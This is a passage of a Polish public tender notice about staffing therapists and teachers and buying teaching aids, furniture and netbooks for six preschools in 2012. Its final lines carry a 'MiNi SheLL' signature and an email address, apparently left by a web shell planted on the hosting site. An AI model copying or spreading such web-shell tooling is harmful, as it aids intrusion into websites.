- zatrudnienie specjalisty psychologa - zadanie realizowane będzie przez psychologa zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r, w wymiarze 1170 godzin zegarowych  dla 30 dzieci w przedszkolach nr 1,2,3,4,5,6. Jedna godzina dydaktyczna dla jednego dziecka w tygodniu (godzina dydaktyczna trwa 60 minut).
- zatrudnienie specjalisty psychologa klinicznego - zadanie realizowane będzie przez psychologa zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r, w wymiarze 780 godzin zegarowych  dla 20 dzieci w przedszkolu nr 3. Jedna godzina dydaktyczna dla jednego dziecka w tygodniu (godzina dydaktyczna trwa 60 minut).
- zatrudnienie specjalisty terapii integracji sensorycznej - zadanie realizowane będzie przez psychologa zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r, w wymiarze 1170 godzin zegarowych  dla 30 dzieci w przedszkolu nr 3. Jedna godzina dydaktyczna dla jednego dziecka w tygodniu (godzina dydaktyczna trwa 60 minut).
- zatrudnienie specjalisty terapii polisensorycznej - zadanie realizowane będzie przez specjalistę terapii polisensorycznej zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r, w wymiarze 78 godzin zegarowych  dla 2 grup w przedszkolu nr 3. Jedna godzina dydaktyczna dla jednej grupy w tygodniu (godzina dydaktyczna trwa 60 minut).
- zatrudnienie specjalistów terapii widzenia, surdopedagoga i in. terapeutów specjalistycznych - zadanie realizowane będzie przez specjalistów poszczególnych terapii zatrudnionych od dnia podpisania umowy do dnia 30.07.2012 r, w wymiarze 234 godzin zegarowych  dla 6 dzieci grup w przedszkolu nr 3. Jedna godzina dydaktyczna dla jednego dziecka w tygodniu (godzina dydaktyczna trwa 60 minut).

Zadanie nr 4  - Wsparcie przedszkoli dodatkowymi zajęciami
- zatrudnienie specjalistów logopedów - zadanie realizowane będzie przez specjalistów logopedów zatrudnionych od dnia podpisania umowy do dnia 30.07.2012 r, w wymiarze 780 godzin zegarowych  dla 40 grup w przedszkolach nr 1,2,4,5,6 po 6 grup. Dla każdej grupy jedna jednostka dydaktyczna  w tygodniu, (jednostka dydaktyczna trwa 30 minut). W przedszkolu nr 3 - 10 grup. Dla każdej grupy jedna jednostka dydaktyczna w tygodniu, (jednostka dydaktyczna trwa 30 minut).
-  zatrudnienie specjalisty logarytmika - zadanie realizowane będzie przez specjalistę logarytmika zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r, w wymiarze 136,5  godziny zegarowej  dla 7 grup w przedszkolu nr 3. Jedna godzina dydaktyczna dla jednej grupy w tygodniu (godzina dydaktyczna trwa 30 minut).
- zatrudnienie nauczyciela gimnastyki korekcyjnej - zadanie realizowane będzie przez nauczyciela gimnastyki zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r. Jedna jednostka dydaktyczna dla jednej grupy w tygodniu (godzina dydaktyczna trwa 30 minut). 
W wymiarze: 
4 grupy w przedszkolu nr 1 ( 78 godzin zegarowych), 5 grup w przedszkolu nr 2 ( 97,5 godzin zegarowych), 10 grup w przedszkolu nr 3 ( 195 godzin zegarowych), 5 grup w przedszkolu nr 4 (97,5 godziny zegarowej), 3 grupy w przedszkolu nr 5 (58,5 godziny zegarowej).
- zatrudnienie nauczyciela rytmiki - zadanie realizowane będzie przez nauczyciela gimnastyki zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r. Jedna jednostka dydaktyczna dla jednej grupy w tygodniu (godzina dydaktyczna trwa 30 minut). 
W wymiarze :
2 grupy w przedszkolu nr 1 (39 godzin zegarowych), 2 grupy w przedszkolu nr 2 (39 godzin zegarowych), 5 grup w przedszkolu nr 3 (97,5 godziny zegarowej), 3 grupy w przedszkolu nr 4 (58,5 godziny zegarowej), 3 grupy w przedszkolu nr 6 (58,5 godziny zegarowej).
- zatrudnienie nauczyciela tańca - zadanie realizowane będzie przez nauczyciela gimnastyki zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r. Jedna jednostka dydaktyczna dla jednej grupy w tygodniu (godzina dydaktyczna trwa 30 minut). 
W wymiarze:
4 grupy w przedszkolu nr 2 (78 godzin zegarowych), 5 grup w przedszkolu nr 3 ( 97,5 godziny zegarowej), 3 grupy w przedszkolu nr 4 (58,5 godziny zegarowej), 2 grupy w przedszkolu nr 5 (39 godzin zegarowych), 1 grupa w przedszkolu nr 6 (19,5 godziny zegarowej).
-  zatrudnienie nauczyciela plastyki - zadanie realizowane będzie przez nauczyciela gimnastyki zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r. Jedna jednostka dydaktyczna dla jednej grupy w tygodniu (godzina dydaktyczna trwa 30 minut).
W wymiarze:
1 grupa w przedszkolu nr 1 (19,5 godziny zegarowej), 1 grupa w przedszkolu nr 5 (19,5 godziny zegarowej), 1 grupa w przedszkolu nr 6 (19,5 godziny zegarowej), 

-  zatrudnienie lektora języka angielskiego - zadanie realizowane będzie przez  lektora  języka angielskiego zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r. Dwie jednostki dydaktyczne dla grupy w tygodniu (jednostka dydaktyczna trwa 30 minut),
W wymiarze:
4 grupy w przedszkolu nr 1 (156 godzin zegarowych), 4 grupy w przedszkolu nr 2 ( 156 godzin zegarowych), 6 grup w przedszkolu nr 3 (234 godziny zegarowe), 5 grup w przedszkolu nr 4 (195 godzin zegarowych), 3 grupy w przedszkolu nr 5 (117 godzin zegarowych), 3 grupy w przedszkolu nr 6 (117 godzin zegarowych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.11.00.00-8, 80.34.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa pomocy dydaktycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 Przygotowanie przedszkoli do działań projektowych

Podzadanie 1. Artykuły plastyczne na potrzeby dodatkowych zajęć i nowych grup  
6 kompletów artykułów plastycznych - szczegółowy opis w załączniku nr 1

Podzadanie 2. Doposażenie sal w przedszkolach przyjmujących dodatkowe 4 grupy:
4 zestawy mebli - szczegółowy opis w załączniku nr 1

Wszystkie meble muszą posiadać Certyfikat zgodny z normami Unii Europejskiej 
dopuszczający je do użytku w placówkach oświatowych, wydany przez Zakład Certyfikacji.

Podzadanie 3. Zakup kompletów pomocy dydaktycznych dla nowoutworzonych grup
4 zestawy pomocy dydaktycznych - szczegółowy opis w załączniku nr 1

Podzadanie 4. Zakup modułów Matematyka sensoryczna 1 i 2 (gąsienice),Klucza do uczenia się. 
Program wychowania przedszkolnego Klucz do uczenia się, Moduł Matematyka sensoryczna cz. 1 Gąsienice (scenariusze zajęć dla nauczycieli + komplet 10 pomocy dydaktycznych) Ilość 5 sztuk, do 5 placówek

Program wychowania przedszkolnego Klucz do uczenia się, Moduł Matematyka sensoryczna cz. 2 Gąsienice (scenariusze zajęć dla nauczycieli + komplet 10 pomocy dydaktycznych)  Ilość 5 sztuk do 5 placówek

Podzadanie 5. Zakup modułu Program Literacki (gąsienice) Klucza do uczenia się. 
Program wychowania przedszkolnego Klucz do uczenia się Moduł Program Literacki Gąsienice (scenariusze zajęć dla nauczycieli + komplet 10 pomocy dydaktycznych)  Ilość 5 sztuk do 5 placówek

Podzadanie 6. Zakup modułu Konstrukcje (gąsienice) Klucza do uczenia się
Program wychowania przedszkolnego, Klucz do uczenia się Moduł konstrukcje Gąsienice (scenariusze zajęć dla nauczycieli + komplet 10 pomocy dydaktycznych)  Ilość 5 sztuk, do 5 placówek

Podzadanie 7. Zakup modułu Od bazgrania do pisania (gąsienice),Klucza do uczenia się
Program wychowania przedszkolnego,Klucz do uczenia się Moduł Od bazgrania do pisania Gąsienice (scenariusze zajęć dla nauczycieli + komplet 10 pomocy dydaktycznych)  Ilość 5 sztuk do 5 placówek

Podzadanie 8. Zakup modułów Matematyka 1 i 2 (motyle),Klucza do uczenia się. 
Program wychowania przedszkolnego Klucz do uczenia się, Moduł Matematyka  cz. 1 Motyle (scenariusze zajęć dla nauczycieli + komplet 10 pomocy dydaktycznych)  Ilość 5 sztuk do 5
placówek.
Program wychowania przedszkolnego ,Klucz do uczenia się, Moduł Matematyka  cz. 2 Motyle (scenariusze zajęć dla nauczycieli + komplet 10 pomocy dydaktycznych)  Ilość 5 sztuk do 5 placówek

Podzadanie 9. Zakup modułu Program Literacki (motyle) ,Klucza do uczenia się. 
Program wychowania przedszkolnego Klucz do uczenia się, Moduł Program Literacki Motyle (scenariusze zajęć dla nauczycieli + komplet 10 pomocy dydaktycznych)  Ilość 5 sztuk do 5 placówek

Podzadanie 10. Zakup modułu Konstrukcje (motyle),Klucza do uczenia się
Program wychowania przedszkolnego ,Klucz do uczenia się Moduł konstrukcje Motyle (scenariusze zajęć dla nauczycieli + komplet 10 pomocy dydaktycznych)  Ilość 5 sztuk do 5 placówek

Podzadanie 11. Zakup modułu Od bazgrania do pisania (motyle),Klucza do uczenia się
Program wychowania przedszkolnego Klucz do uczenia się, Moduł Od bazgrania do pisania motyle (scenariusze zajęć dla nauczycieli + komplet 10 pomocy dydaktycznych)  Ilość 5 sztuk do 5 placówek


Podzadanie 12. Dodatkowe pomoce dydaktyczne -klocki
Zestaw klocków drewnianych do realizacji modułu Konstrukcje w ramach programu Klucz do uczenia się. Ilość 50 sztuk, do 5 placówek

Podzadanie 13. Dodatkowe pomoce dydaktyczne - modele Ducha
Modele ducha do konstrukcji w ramach programu Klucz do uczenia się - 5 zestawów do 6 placówek.

Podzadanie 14. Wyposażenie mobilnej pracowni komputerowej w przedszkolu nr 3 

Netbook dla dziecka z oprogramowaniem -  12 szt - szczegółowy opis w załączniku nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.10.00-8, 39.19.00.00-7, 37.52.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com